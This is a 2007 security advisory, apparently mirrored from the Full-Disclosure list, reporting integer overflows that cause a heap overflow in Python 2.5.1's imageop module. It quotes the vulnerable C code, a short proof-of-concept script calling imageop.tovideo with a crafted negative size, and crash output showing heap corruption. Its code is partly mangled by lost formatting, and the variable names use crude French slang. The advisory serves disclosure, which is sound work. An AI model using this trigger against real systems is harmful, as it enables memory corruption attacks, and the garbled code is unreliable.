[Full-disclosure] python <= 2.5.1 standart librairy multiples int overflow, heap overflow in imageop module

2007-09-19T00:00:00
ID SECURITYVULNS:DOC:18028
Type securityvulns
Reporter Securityvulns
Modified 2007-09-19T00:00:00

Description

The module imageop contains a lots of int overflow, which result in heap overflow, and maybe memory dump. The files imageop.c and rbgimgmodule.c are examples.

static PyObject imageop_tovideo(PyObject self, PyObject *args) { int maxx, maxy, x, y, len;

........................

/* *************** int overflow here permit to bypass len check

*** */

if ( maxxmaxywidth != len ) { PyErr_SetString(ImageopError, "String has incorrect length"); return 0; }

rv = PyString_FromStringAndSize(NULL, len);
if ( rv == 0 )
    return 0;
ncp = (unsigned char *)PyString_AsString(rv);

if ( width == 1 ) {
    memcpy(ncp, cp, maxx);        /* Copy first line */
    ncp += maxx;

/ * with a negativ value it's possible to bypass the code * /

    for (y=1; y<maxy; y++) {    /* Interpolate other lines */

an IA 32 bits Proof of Concept:


import imageop

sexshit = "a"1603 evil = "p"5241 connard = "s"2000 supaire= "45"65 print supaire connard = "cool" salope = "suceuse" dtc = imageop.tovideo(sexshit,1,4461,-2147002257) sexshit = "dtc"*52 print connard,supaire," fin de dump"


www@AtlanticDrive:~$ python sux.py 4545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545 cool 4545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545 fin de dump glibc detected corrupted double-linked list: 0x0817d3f0 *** Abandon www@AtlanticDrive:~$

ok, i hate the python's syntax, that's too old school !